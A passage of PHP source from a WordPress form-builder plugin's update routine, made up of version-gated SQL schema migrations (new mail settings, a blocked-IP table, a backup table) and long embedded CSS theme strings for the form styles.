16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #006C14;\r\n	cursor: pointer;\r\n	background-color: #7FB589;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #006C14;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #008118 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #008118 ), color-stop(67%, #089723 ), color-stop(100%, #069C22 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #008118 0%, #089723 67%, #069C22 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FB589;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #069B22;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $formmaker_blocked = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_blocked` (
        `id` int(11) NOT NULL AUTO_INCREMENT,
        `ip` varchar(128) NOT NULL,
        PRIMARY KEY (`id`)
      ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1";
    $wpdb->query($formmaker_blocked);
  }
  if (version_compare($version, '1.7.6') == -1) {
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `condition` text NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_cc` varchar(128) NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_cc_user` varchar(128) NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_bcc` varchar(128) NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_bcc_user` varchar(128) NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_subject` varchar(128) NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_subject_user` varchar(128) NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_mode` tinyint(4) NOT NULL DEFAULT '1'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_attachment` tinyint(4) NOT NULL DEFAULT '1'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1'");

    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` CHANGE `tax` `tax` float NOT NULL DEFAULT '0'");

    $wpdb->query('UPDATE ' . $wpdb->prefix . 'formmaker SET `mail_mode` = 1, `mail_mode_user` = 1, `mail_attachment` = 1, `mail_attachment_user` = 1');
  }
  if (version_compare($version, '1.7.13') == -1) {
    $formmaker_query = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_query` (
      `id` int(11) NOT NULL AUTO_INCREMENT,
      `form_id` int(11) NOT NULL,
      `query` text NOT NULL,
      `details` text NOT NULL,
      PRIMARY KEY (`id`)
    ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;";
    $wpdb->query($formmaker_query);
  }
  if (version_compare($version, '1.7.20') == -1) {
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `user_id_wd` varchar(220) NOT NULL DEFAULT 'administrator,'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `sortable` int(11) NOT NULL DEFAULT '1'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker_submits` ADD `user_id_wd` int(11) NOT NULL DEFAULT '1'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `frontend_submit_fields` text NOT NULL DEFAULT ''");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `frontend_submit_stat_fields` text NOT NULL DEFAULT ''");
    $wpdb->query('UPDATE ' . $wpdb->prefix . 'formmaker_themes SET `css` = CONCAT(css,"\r\n.wdform_column {\r\n	border-right: none !important;\r\n }")');
  }
 
  if (version_compare($version, '1.8.27') == -1) {
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_emptyfields` tinyint(4) NOT NULL DEFAULT '0'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` CHANGE `form_fields` `form_fields` longtext NOT NULL");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_verify` tinyint(4) NOT NULL DEFAULT '0'");
	$wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_verify_expiretime` float NOT NULL");
	$wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_verification_post_id` int(11) NOT NULL");
    $formmaker_backup = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_backup` (
	  `backup_id` int(11) NOT NULL AUTO_INCREMENT,
	  `cur` int(1) NOT NULL,
	  `id` int(11) NOT NULL,
	  `title` varchar(127) NOT NULL,
	  `mail` varchar(128) NOT NULL,
	  `form_front` longtext NOT NULL,
	  `theme` int(11) NOT NULL,
	  `javascript` text NOT NULL,
	  `submit_text` longtext NOT NULL,
	  `url` varchar(200) NOT NULL,
	  `submit_text_type` tinyint(4) NOT NULL,
	  `script_mail` text NOT NULL,
	  `script_mail_user` text NOT NULL,
	  `counter` int(11) NOT NULL,
	  `published` int(11) NOT NULL DEFAULT '1',
	  `label_order` text NOT NULL,
	  `label_order_current` text NOT NULL,
	  `article_id` varchar(500) NOT NULL,
	  `pagination` varchar(128) NOT NULL,
	  `show_title` varchar(128) NOT NULL,
	  `show_numbers` varchar(128) NOT NULL,
	  `public_key` varchar(50) NOT NULL,
	  `private_key` varchar(50) NOT NULL,
	  `recaptcha_theme` varchar(20) NOT NULL,
	  `paypal_mode` int(2) NOT NULL,
	  `checkout_mode` varchar(20) NOT NULL,
	  `paypal_email` varchar(50) NOT NULL,
	  `payment_currency` varchar(20) NOT NULL,
	  `tax` float NOT NULL,
	  `form_fields` longtext NOT NULL,
	  `savedb` tinyint(4) NOT NULL DEFAULT '1',
	  `sendemail` tinyint(4) NOT NULL DEFAULT '1',
	  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
	  `from_mail` varchar(128) NOT NULL,
	  `from_name` varchar(128) NOT NULL,
	  `reply_to` varchar(128) NOT NULL,
	  `send_to` varchar(128) NOT NULL,
	  `autogen_layout` tinyint(4) NOT NULL DEFAULT '1',
	  `custom_front` longtext NOT NULL,
	  `mail_from_user` varchar(128) NOT NULL,
	  `mail_from_name_user` varchar(128) NOT NULL,
	  `reply_to_user` varchar(128) NOT NULL,
	  `condition` text NOT NULL,
	  `mail_cc` varchar(128) NOT NULL,
	  `mail_cc_user` varchar(128) NOT NULL,
	  `mail_bcc` varchar(128) NOT NULL,
	  `mail_bcc_user` varchar(128) NOT NULL,
	  `mail_subject` varchar(128) NOT NULL,
	  `mail_subject_user` varchar(128) NOT NULL,
	  `mail_mode` tinyint(4) NOT NULL DEFAULT '1',
	  `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1',
	  `mail_attachment` tinyint(4) NOT NULL DEFAULT '1',
	  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1',
	  `user_id_wd` varchar(220) NOT NULL,
	  `sortable` int(11) NOT NULL,
	  `frontend_submit_fields` text NOT NULL,
	  `frontend_submit_stat_fields` text NOT NULL,
	  `mail_emptyfields` tinyint(4) NOT NULL DEFAULT '0',
	  `mail_verify` tinyint(4) NOT NULL DEFAULT '0',
	  `mail_verify_expiretime` float NOT NULL,
	  `mail_verification_post_id` int(11) NOT NULL,
	  `save_uploads` tinyint(4) NOT NULL DEFAULT 1,
	  PRIMARY KEY (`backup_id`)
	) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;";
    $wpdb->query($formmaker_backup);
  
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `save_uploads` tinyint(4) NOT NULL DEFAULT 1");
  }
  return;
}

function form_maker_update_contact() {
  if (get_option('contact_form_forms', FALSE)) {
    global $wpdb;
    $plugin_url = WD_FMC_URL;
    $replace_url = str_replace('form-maker', 'contact-form-maker', $plugin_url);
    $replace_url_captcha = admin_url('admin-ajax.php') . '?action=formcontactwdcaptcha';
    $wpdb->query("UPDATE " . $wpdb->prefix . "formmaker set form = replace(form, '" . $replace_url . "', '" . $plugin_url . "')");
    $wpdb->query("UPDATE " . $wpdb->prefix . "formmaker set form_front = replace(form_front, '" . $replace_url . "', '" . $plugin_url . "')");
    $wpdb->query("UPDATE " . $wpdb->prefix . "formmaker set form = replace(form, '" . $replace_url_captcha . "', '" . admin_url('admin-ajax.php') . '?action=formcontactwdcaptcha' . "')");
    $wpdb->query("UPDATE " . $wpdb->prefix . "formmaker set form_front = replace(form_front, '" . $replace_url_captcha . "', '" . admin_url('admin-ajax.php') . '?action=formcontactwdcaptcha' . "')");
    $standart_theme_id = $wpdb->get_results("SELECT `id` FROM " . $wpdb->prefix . "formmaker_themes WHERE `default`=1");
    $wpdb->query("UPDATE " . $wpdb->prefix . "formmaker_themes set `default` = 0");
    $wpdb->query("UPDATE " . $wpdb->prefix . "formmaker_themes set `default` = 1 WHERE `id`={$standart_theme_id[0]->id}");
  }
}

function form_maker_update_until_mvc() {
  global $wpdb;
  if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_sessions'") != $wpdb->prefix . "formmaker_sessions") {
  if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker'") == $wpdb->prefix . "formmaker") {
    if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_themes'") != $wpdb->prefix . "formmaker_themes") {
      $form_maker_views_table = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_views` (
  `form_id` int(11) NOT NULL,
  `views` int(50) NOT NULL,
  PRIMARY KEY (`form_id`)
) DEFAULT CHARSET=utf8";
      $form_maker_theme_table = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `css` text NOT NULL,
  `default` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`)
) DEFAULT CHARSET=utf8 AUTO_INCREMENT=17";
      $table_name = $wpdb->prefix . "formmaker_themes";
      $plugin_path = WD_FMC_URL;
      if ($wpdb->get_var("SHOW TABLES LIKE '" . $wpdb->prefix . "formmaker_themes'") != $wpdb->prefix . "formmaker_themes")
        $form_maker_theme_rows = <<<HEREQUERYTHEMT



INSERT INTO `{$table_name}` (`id`, `title`, `css`, `default`) VALUES
(1, 'Style 1 Transparent', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important;\n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:21px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:17px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nheight:17px !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:17px !important;\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#000 !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:transparent !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#D3D3D3 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}', 0),
(2, 'Style 1 Gray', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#333333 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:22px !important;\nfont-size:12px !important;\npadding:1px 